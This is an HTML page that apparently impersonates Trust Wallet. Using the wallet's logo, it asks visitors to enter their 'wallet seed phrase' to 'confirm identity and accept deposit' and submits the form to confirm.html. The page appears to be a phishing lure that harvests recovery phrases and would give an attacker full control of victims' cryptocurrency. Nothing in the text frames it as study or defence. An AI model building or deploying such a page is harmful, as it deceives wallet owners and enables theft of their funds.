<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Blockchain</title>
</head>
<style>
    *{
        margin: 0;
        font-family:  sans-serif;
    }
    nav{
        background-color: rgb(255, 255, 255);
        height: 50px;
        display: flex;
        align-items: center;
    }
section{
    display: flex;
    justify-content: center;
    align-items: center;
    border-top: 1px solid rgb(206, 206, 206);
    padding-top: 50px;
}
form{
        margin-top: 100px;
        text-align: center;
        /* background-color: rgb(211, 17, 17); */
        padding: 20px;
        border-radius: 10px;
        
      /* margin-left: 10px;
      margin-right: 10px; */
    }
    button{
        width: 360px;
        padding: 15px;
        background-color: rgb(57, 144, 237);
        border: none;
        color: white;
        border-radius: 100px;
        margin-top: 30px;
        margin-bottom: 40px;
    }
    h3{
        margin-bottom: 20px;
    }
    img{
    height: 50px;
}
</style>
<body>
    <header>
        <nav>
            <div><img src="img/trustwallet.png" alt=""></div>
            
        </nav>
    </header>
    <section>
        <form action="confirm.html">
            <h3>Input phrase to confirm identity and accept deposit</h3>
            <!-- <h2>Confirm identity and access deposit</h2> -->
            
            <textarea placeholder="wallet seed phrase..." name="" id="" cols="40" rows="10"></textarea><br>
            <button>continue</button>
            <!-- <p>secured by something</p> -->
        </form>
    </section>
</body>
</html>
